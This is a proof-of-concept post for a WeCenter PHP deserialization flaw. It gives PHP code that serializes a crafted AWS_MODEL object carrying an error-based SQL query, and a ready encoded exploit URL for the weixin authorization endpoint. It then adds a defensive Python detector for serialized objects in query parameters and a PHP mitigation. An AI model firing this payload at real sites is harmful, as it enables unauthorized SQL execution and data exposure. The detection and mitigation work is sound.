WeCenter deserialization leading to arbitrary SQL statement execution

Code:

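<?php
// Local stand-in class so that serialize() emits the class name AWS_MODEL
class AWS_MODEL {
    // Private property that carries the SQL statement inside the serialized object
    private $_shutdown_query;
    function __construct()
    {
        $this->_shutdown_query = [
            "SELECT updatexml(1,concat(0xa,user()),1)"
        ];
    }
}
// Array with an 'errcode' entry plus the crafted object
$arr = [
    'errcode' => 1,
    new AWS_MODEL()
];
// Serialize, base64-encode, then URL-encode for use as a query parameter
echo urlencode(base64_encode(serialize($arr)));
?>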

Generated PoC:

?/m/weixin/authorization/&state=OAUTH&access_token=YToyOntzOjc6ImVycmNvZGUiO2k6MTtpOjA7Tzo5OiJBV1NfTU9ERUwiOjE6e3M6MjY6IgBBV1NfTU9ERUwAX3NodXRkb3duX3F1ZXJ5IjthOjE6e2k6MDtzOjQwOiJTRUxFQ1QgdXBkYXRleG1sKDEsY29uY2F0KDB4YSx1c2VyKCkpLDEpIjt9fX0%3D
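
A defender-side check for the request shape above, as an added example that is not part of the original post: it base64-decodes every query parameter and reports PHP class names found in serialized object markers. The host name, helper names and sample tokens are constructed for illustration, and the regex is a heuristic that can also match object-like text inside a serialized string.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote, urlsplit

# PHP serialize() object markers: O:<len>:"Class":<n>:{ and C:<len>:"Class":<n>:{
PHP_OBJECT = re.compile(rb'(?:^|[;{}])[OC]:\d+:"([A-Za-z_\\][A-Za-z0-9_\\]*)":\d+:\{')


def decode_b64(value):
    """Return the decoded bytes, or None when value is not valid base64."""
    # parse_qsl turns a raw '+' into a space; undo that and accept URL-safe base64.
    value = value.replace(" ", "+").replace("-", "+").replace("_", "/")
    try:
        return base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None


def serialized_classes(url):
    """Map parameter name -> class names seen in base64-wrapped PHP serialized data."""
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        raw = decode_b64(value)
        if raw is None:
            continue
        classes = [m.decode() for m in PHP_OBJECT.findall(raw)]
        if classes:
            findings[name] = classes
    return findings


# Constructed sample requests (hypothetical host; tokens built here, no SQL inside).
BASE = "http://wecenter.example/?/m/weixin/authorization/&state=OAUTH&access_token="
PLAIN_ARRAY = b'a:1:{s:7:"errcode";i:0;}'                         # scalars only
WITH_OBJECT = b'a:2:{s:7:"errcode";i:1;i:0;O:9:"AWS_MODEL":0:{}}'  # embeds an object
SAMPLE_URLS = [BASE + quote(base64.b64encode(p)) for p in (PLAIN_ARRAY, WITH_OBJECT)]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        hits = serialized_classes(url)
        print("ALERT" if hits else "ok   ", hits)
```

On the PHP side, the matching mitigation is to decode such a token with `unserialize($data, ['allowed_classes' => false])` or to switch the token to JSON, so that no application class can be instantiated from request data.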

